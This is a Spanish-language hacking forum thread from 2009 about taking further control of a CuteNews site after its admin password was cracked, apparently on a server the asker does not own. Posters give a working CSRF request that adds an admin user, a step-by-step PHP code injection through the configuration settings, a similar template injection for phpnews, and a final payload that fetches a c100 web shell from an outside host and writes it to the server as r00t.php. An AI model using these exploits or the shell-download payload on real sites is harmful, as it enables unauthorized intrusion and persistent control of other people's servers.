Título: CuteNews Escalar privilegios Publicado por: xalupeao en 23 Mayo 2009, 06:24 am Hola buenas ya he podido entrar al admin del cutenews usando dos exploit, uno que me buscar el nick del admin y otro me mostrara el hash en md5 y bueno pude entrar pero ahora quiero tratar de ir por mas pero no se me ocurre como poder escalar mas privilegios, quiero de alguna manera injectar una shell c99 o algo para poder tener un poco mas de control sobre el servidor, y hay esta la pregunta...
¿Se puede escalar mas privilegios por medio de Cutenew o bien injectar una shell? Título: Re: CuteNews Escalar privilegios Publicado por: CICOLO_111234 en 23 Mayo 2009, 15:02 pm lo mejor es inyectar 1 shell...
busca en el panel del admin alguna opcion para subir archivos al servidor, como una imagen, documento... salu2 Título: Re: CuteNews Escalar privilegios Publicado por: xalupeao en 23 Mayo 2009, 20:01 pm es posible subir una imagen pero ahora se vien la pregunta de qe archivo hace un include local.
Título: Re: CuteNews Escalar privilegios Publicado por: sirdarckcat en 24 Mayo 2009, 06:15 am no hay una manera "por default" de escalar privilegios en cutenews.. para encontrar alguna manera tendrias que revisar el codigo fuente por vulnerabilidades.
Título: Re: CuteNews Escalar privilegios Publicado por: WHK en 24 Mayo 2009, 10:08 am no hay una manera "por default" de escalar privilegios en cutenews.. para encontrar alguna manera tendrias que revisar el codigo fuente por vulnerabilidades. Yo decidí hace un tiempo revisar el código fuente de ese sistema y si tiene varias fallas, mas de 5 si no me falla mi memoria de elefante php. No recuerdo cuales eran pero si pretendes explotar el que está en la sección de noticias ( http://www.elhacker.net/notis/ ) no podrás porque eliminaron casi todos los archivos donde podías infiltrarte. Recuerdo si que tenía csrf por todos lados y podías crear y borrar usuarios y hacerlos admin. Si no me equivoco los usuarios eran manejados en archivos de texto y no en bases de datos MySQL. Mañana lo bajaré otraves para hecharle una rehojeada. Edito --> Citar http://127.0.0.1/cutenews/index.php POST /cutenews/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://127.0.0.1/cutenews/index.php?mod=editusers&action=list Cookie: lastusername=whk; username=whk; md5_password=xxx; Content-Type: application/x-www-form-urlencoded Content-Length: 128 regusername=zkizzik®password=_123456®nickname=zkizzik®email=zkizzik%40gmail.com®level=1&action=adduser&mod=editusers Agregué un user de prueba como admin y no hay token ni referer de verificación, ahi ya tienes un csrf y puedes crear usuarios admin si es que pillas al admin original y haces que vea una web tuya donde se le redireccionará. Si mi memoria de elefante php no me falla recuerdo que la primera ves que vi este sistema pude ver que las peticiones post podían procesarse como si fueran get al igual que cpanel asi que puedes causar un csrf desde una imagen en un foro, etc. Edito2 --> Si se puede: http://127.0.0.1/cutenews/index.php?regusername=zkizzik®password=_123456®nickname=zkizzik®email=zkizzik%40gmail.com®level=1&action=adduser&mod=editusers Citar User Added The user zkizzik was successfully added as administrator go back Título: Re: CuteNews Escalar privilegios Publicado por: xalupeao en 25 Mayo 2009, 04:01 am El usuario y contraseña ya lo tengo tengo acceso al administrador pero lo que quiero es injectarle una shell, lamentablemente el host no acepta RFI y tampoco me permite leer los archivos de la carpeta "data" por lo cual es imposible usar los otros conocidos exploit.
lo que quiero es injectar un shell. Título: Re: CuteNews Escalar privilegios Publicado por: Azielito en 26 Mayo 2009, 02:49 am aaaaaaaaa si, yo alguna vez (aun trato xD) intente de poner una shell, lo unico que encontre fue algo de un avatar pero lo "inserta" con html, o sea
Código
¬¬ y yo lo hablilite para poder subir una shell (bypasseando el filetype XD) y nada, no encontre forma, y si pones codigo php en una "entrada" no lo interpreta como tal ¬¬ Ahora mismo no traigo mi server de pruebas pero mañana intento hacer algo de SQL en las entradas a ver si encuentro algo ñ_ñ' Título: Re: CuteNews Escalar privilegios Publicado por: WHK en 26 Mayo 2009, 05:30 am Citar Ahora mismo no traigo mi server de pruebas pero mañana intento hacer algo de SQL en las entradas a ver si encuentro algo ñ_ñ' No usa SQL, solamente guarda todos los datos en archivos de texto.Ya pude inyectar una shell y no está tan dificil, solamente que debes regirte por un filtro htmlspecialchars sin token o sea que puedes escribir comillas simples y con eso crear tu código php de la siguiente forma. Fijate en configuraciones: http://127.0.0.1/cutenews/index.php?mod=options&action=syscon&rand=xxx (http://img.drawcoders.net/index.php?acn=observar&idi=30bb7fd655_vuln.PNG) Cuando guardas una configuración lo que haces es sobreescribir un archivo llamado data/config.php Código
El filtro dice así: inc/options.mdu linea 755 a 760 Código
Como htmlspecialchars no tiene token ENT_QUOTES (http://cl.php.net/htmlspecialchars) significa que podemos insertar comillas simples pero si no podemos inyectar con comillas dobles para escapar de la variable $config_http_script_dir como lo hacemos?: (http://img.drawcoders.net/index.php?acn=observar&idi=bdb0e62632_vuln2.PNG) Fijate que en el input donde va el link del cutenews le puse al final el carácter "\" asi que tomará la comilla doble como parte de la misma variable y queda masomenos así: (http://img.drawcoders.net/index.php?acn=observar&idi=c0a99ef6b2_vuln3.PNG) Ahora que logramos escapar hay que cerrar la variable y comenzara a inyectar código: Citar ; echo 'test'; exit; /* Fijate que este contenido queda acá: Citar $config_skin = "default"; asi que nos encontramos con la comilla doble que cierra la primera variable y comenzamos a escribir en php pero primero cerramos con ";" y para que el código no quede corrupto y se quede sin hacer nada cerramos con "/*" y queda:(http://img.drawcoders.net/index.php?acn=observar&idi=5b8dea2339_vulnx.PNG) (http://img.drawcoders.net/index.php?acn=observar&idi=09b2c7022d_vuln4.PNG) Ya sabemos que se ejecuta el código pero ojo que cuando lo hagas quedará corrupto pero las configuraciones por defecto de cutenews permiten que alcance a terminar de ejecutar nuestra inyeción asi que hay solo una oportunidad y si te fijas también no puedes ejecutar código y terminar con exit si es que no se debolvió algún buffer de stream en el php (debe ser por la misma configuración y ob_start() ) asi que en total nos queda masomenos así: Código
Cuando lo hagas te va a dar el mismo error que la imagen anterior pero si vas a http://127.0.0.1/cutenews/r00t.php verás algo así como esto: (http://img.drawcoders.net/index.php?acn=observar&idi=7bc7bd7ba8_pwned.PNG) Título: Re: CuteNews Escalar privilegios Publicado por: WHK en 26 Mayo 2009, 05:53 am Lo agregué al recopilatorio de post
https://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_25509-t244090.0.html Y de pasada hize un video: 6tM6UP9J_hE Título: Re: CuteNews Escalar privilegios Publicado por: Azielito en 26 Mayo 2009, 18:07 pm '_' :-o
Excelente :0 Estaba confundiendo el sistema, con el que estaba haciendo pruebas era con phpnews, no se por que los confundí :xD sorry ._________. intentaré hacer lo mismo con este :-) Ya, despues de varios intentos logre inyectar codigo php ñ_ñ' siguiendo el tutorial que has puesto WHK :D bien, basicamente es lo mismo solo que mejor :xD vamos a editar el templete, yo escogí el de news.php, o sea, donde se muestran las noticias xD :http://localhost/phpnews/phpnews1.0/index.php?action=modtemp esto nos muestra lo siguiente Código
Si vemos el archivo news_temp.php nos dirá todo Código
Cuando modificamos cualquier cosa desde el panel de administración lo refleja directamente en éste archivo ñ_ñ Para finalizar, desde el panel de administración modificamos el template de modo que quede así: Código
Esto dará como resultado éste código en nuestro "news_temp.php" Código
y tenemos magia x) Cita de: http://localhost/ipm/phpnews/phpnews1.0/news.php?x=dir Código
ñ_ñ Gracias a WHK por el tuto anterior x) Título: Re: CuteNews Escalar privilegios Publicado por: xalupeao en 18 Junio 2009, 02:49 am Tengo una duda como se llama esa herramienta que estas usando para editar el input de ese form ?... gracias
Título: Re: CuteNews Escalar privilegios Publicado por: WHK en 18 Junio 2009, 05:33 am Se llama FireBug
https://addons.mozilla.org/es-ES/firefox/addon/1843 Título: Re: CuteNews Escalar privilegios Publicado por: xalupeao en 9 Agosto 2009, 16:32 pm hay un problema, cuando tu dejas
Full URL to CuteNews Directory http://localhost/cutenews\ el archivo config.php queda asi $config_http_script_dir = "http://localhost/cutenews\\"; por ende no toma :S hay otra forma? Título: Re: CuteNews Escalar privilegios Publicado por: xalupeao en 9 Agosto 2009, 17:02 pm Me despondo a mi mismo, hay una forma mas fácil sin dejar rastros visibles.
editen el templete default cualquiera, ejemplo Active News... al final agregan HTML; phpinfo(); ................. inyectando la shell seria HTML; $s = file_get_contents('http://blacknite.eu/php_shells/c100.txt'); $f = fopen('r00t.php', 'x'); fwrite($f, $s); fclose($f); Saludos. |